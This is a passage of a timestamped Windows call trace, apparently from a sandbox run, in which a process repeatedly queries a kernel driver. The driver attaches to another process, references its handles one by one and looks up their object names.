PsReleaseProcessExitSynchronization () returned 0x2 [0244.569] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.569] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.569] ObfDereferenceObject (Object=0xfffffa800381af20) returned 0x12 [0244.569] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.569] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0244.569] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.569] PsAcquireProcessExitSynchronization () returned 0x0 [0244.569] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.569] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003819910, HandleInformation=0x0) returned 0x0 [0244.569] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.569] PsReleaseProcessExitSynchronization () returned 0x2 [0244.570] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.570] ObfDereferenceObject (Object=0xfffffa8003819910) returned 0x20 [0244.570] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.570] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0244.570] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.570] PsAcquireProcessExitSynchronization () returned 0x0 [0244.570] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.570] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003815a70, HandleInformation=0x0) returned 0x0 [0244.570] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.570] PsReleaseProcessExitSynchronization () returned 0x2 [0244.570] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.570] ObfDereferenceObject (Object=0xfffffa8003815a70) returned 0x12 [0244.570] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.570] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0244.570] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.570] PsAcquireProcessExitSynchronization () returned 0x0 [0244.570] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.570] ObReferenceObjectByHandle (in: Handle=0x214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800381c9c0, HandleInformation=0x0) returned 0x0 [0244.570] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.571] PsReleaseProcessExitSynchronization () returned 0x2 [0244.571] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.571] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.571] ObfDereferenceObject (Object=0xfffffa800381c9c0) returned 0x12 [0244.571] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.571] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.571] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x96, lpOverlapped=0x0) returned 1 [0244.571] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.571] PsAcquireProcessExitSynchronization () returned 0x0 [0244.571] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.571] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800381cd10, HandleInformation=0x0) returned 0x0 [0244.571] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.571] PsReleaseProcessExitSynchronization () returned 0x2 [0244.571] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.571] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.571] ObfDereferenceObject (Object=0xfffffa800381cd10) returned 0x12 [0244.571] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.571] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.571] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0244.571] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.571] PsAcquireProcessExitSynchronization () returned 0x0 [0244.571] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.571] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800abfcbe0, HandleInformation=0x0) returned 0x0 [0244.571] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.571] PsReleaseProcessExitSynchronization () returned 0x2 [0244.571] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.571] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.571] ObfDereferenceObject (Object=0xfffffa800abfcbe0) returned 0x12 [0244.572] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.572] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.572] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0244.572] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.572] PsAcquireProcessExitSynchronization () returned 0x0 [0244.572] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.572] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800381ddc0, HandleInformation=0x0) returned 0x0 [0244.572] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.572] PsReleaseProcessExitSynchronization () returned 0x2 [0244.572] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.572] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.572] ObfDereferenceObject (Object=0xfffffa800381ddc0) returned 0x12 [0244.572] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.572] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.572] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0244.572] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.572] PsAcquireProcessExitSynchronization () returned 0x0 [0244.572] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.572] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003820910, HandleInformation=0x0) returned 0x0 [0244.572] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.572] PsReleaseProcessExitSynchronization () returned 0x2 [0244.572] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.572] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.572] ObfDereferenceObject (Object=0xfffffa8003820910) returned 0x12 [0244.572] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.572] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.572] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0244.572] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.573] PsAcquireProcessExitSynchronization () returned 0x0 [0244.573] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.573] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800a783a30, HandleInformation=0x0) returned 0x0 [0244.573] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.573] PsReleaseProcessExitSynchronization () returned 0x2 [0244.573] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.573] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.573] ObfDereferenceObject (Object=0xfffffa800a783a30) returned 0x12 [0244.573] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.573] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.573] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.573] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.573] PsAcquireProcessExitSynchronization () returned 0x0 [0244.573] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.573] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.573] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.573] PsReleaseProcessExitSynchronization () returned 0x2 [0244.573] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.573] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.573] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.573] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.573] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.573] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.573] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.573] PsAcquireProcessExitSynchronization () returned 0x0 [0244.573] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.573] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.573] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.574] PsReleaseProcessExitSynchronization () returned 0x2 [0244.574] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.574] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.574] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.574] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.574] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.574] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0244.574] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.574] PsAcquireProcessExitSynchronization () returned 0x0 [0244.574] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.574] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034382d0, HandleInformation=0x0) returned 0x0 [0244.574] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.574] PsReleaseProcessExitSynchronization () returned 0x2 [0244.574] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.574] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.574] ObfDereferenceObject (Object=0xfffffa80034382d0) returned 0x1 [0244.575] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.575] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0244.575] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.575] PsAcquireProcessExitSynchronization () returned 0x0 [0244.575] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.575] ObReferenceObjectByHandle (in: Handle=0x2fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003840930, HandleInformation=0x0) returned 0x0 [0244.575] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.575] PsReleaseProcessExitSynchronization () returned 0x2 [0244.575] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.575] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.575] ObfDereferenceObject (Object=0xfffffa8003840930) returned 0x1 [0244.575] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.575] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0244.575] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.575] PsAcquireProcessExitSynchronization () returned 0x0 [0244.575] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.576] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038568c0, HandleInformation=0x0) returned 0x0 [0244.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.576] PsReleaseProcessExitSynchronization () returned 0x2 [0244.576] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.576] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.576] ObfDereferenceObject (Object=0xfffffa80038568c0) returned 0x1 [0244.576] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.576] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.576] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0244.576] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.576] PsAcquireProcessExitSynchronization () returned 0x0 [0244.576] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.576] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800384cf20, HandleInformation=0x0) returned 0x0 [0244.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.576] PsReleaseProcessExitSynchronization () returned 0x2 [0244.576] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.576] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.576] ObfDereferenceObject (Object=0xfffffa800384cf20) returned 0x1 [0244.576] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.576] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.576] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0244.576] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.576] PsAcquireProcessExitSynchronization () returned 0x0 [0244.576] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.576] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0244.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.576] PsReleaseProcessExitSynchronization () returned 0x2 [0244.576] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.576] ObQueryNameString (in: Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.576] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0244.577] IofCompleteRequest (Irp=0xfffffa80019e2540, 